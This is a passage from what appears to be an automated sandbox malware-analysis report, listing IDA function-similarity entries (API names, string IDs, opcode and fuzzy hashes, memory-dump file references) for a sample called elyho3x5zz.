      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassMessageNameSend
      • String ID: ComboBox$ListBox
      • API String ID: 3678867486-1403004172
      • Opcode ID: 1aa9a5fedcd61ac4c6746f205fa814396e56ee98905ee4bb11006db30ca2fd49
      • Instruction ID: 39de10717defc773e74c54d4951fb94bb3ba7f319d2c41f7e92316b1d6f0f999
      • Opcode Fuzzy Hash: 1aa9a5fedcd61ac4c6746f205fa814396e56ee98905ee4bb11006db30ca2fd49
      • Instruction Fuzzy Hash: FF11866BA1D681A1FB10EB10E0521FAA360FFC9780FC44571EA8D47699DF6CD605EB60
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassMessageNameSend
      • String ID: ComboBox$ListBox
      • API String ID: 3678867486-1403004172
      • Opcode ID: e43b7f97c13e843bcb6dbe49a6aeedc4eedee2012ee89b8e0aef76c44f24edce
      • Instruction ID: d6cd3d89390120b7c56abd76f4d463507c2a31c4ff7614ec7c98a42ce82e6946
      • Opcode Fuzzy Hash: e43b7f97c13e843bcb6dbe49a6aeedc4eedee2012ee89b8e0aef76c44f24edce
      • Instruction Fuzzy Hash: 5111B22AA0C685B1FF20E710E0521FAA760FFC67C0FC44571DA8D07A8ADE2CD205EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseCreateHandleProcess
      • String ID:
      • API String ID: 3712363035-3916222277
      • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
      • Instruction ID: 8af65c94c5429c401b3f78ab5e326882cb7f9194d6000ae8d04618a1ce998099
      • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
      • Instruction Fuzzy Hash: D1119E36A18741AAF710AF12F84256AF7A5FBC4780F844175EA8847A65CF3DD080EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassMessageNameSend
      • String ID: ComboBox$ListBox
      • API String ID: 3678867486-1403004172
      • Opcode ID: 56ec3e8c878b8dec19b78c5e1d00d39d91edbb3d9af1a7541dee1bda2a2e2757
      • Instruction ID: 75ff662dd4e22f868f680871dafbf08fd9f0781a0debc783713895f225540944
      • Opcode Fuzzy Hash: 56ec3e8c878b8dec19b78c5e1d00d39d91edbb3d9af1a7541dee1bda2a2e2757
      • Instruction Fuzzy Hash: DD01522AA1C542B1FA20F714E1921B9A360EFC6394FC44271E58D47ADADE6CD609EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _ctrlfp_handle_error_raise_exc
      • String ID: !$sin
      • API String ID: 3384550415-1565623160
      • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
      • Instruction ID: ff0c03c7bacf56266b9defe3fe4febef1d97d7e2f7d202d99c8888cc0d8fe117
      • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
      • Instruction Fuzzy Hash: 5E01FC75E18BC951E614DF22A80133AA252BFDA7D8F504338E95E0ABC8EF7DD0406B00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _ctrlfp_handle_error_raise_exc
      • String ID: !$cos
      • API String ID: 3384550415-1949035351
      • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
      • Instruction ID: da208db8ea534933740705d1f922c7191c49812a9e97c7810542ed87fecddb7b
      • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
      • Instruction Fuzzy Hash: 8201FC75E28B8951E614DF22A80133AA152BFDA7D8F504338E95E0ABC8EF7DD0507B00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _handle_error
      • String ID: "$exp
      • API String ID: 1757819995-2878093337
      • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
      • Instruction ID: 0074d37248f25814451b542b0a34cf069c97e6e21048713dd71f3ae1c79e2b5a
      • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
      • Instruction Fuzzy Hash: 3201C83A928B8883F220DF24D4462AAB7B0FFEA744F601319E74416A64CB7DD481AB00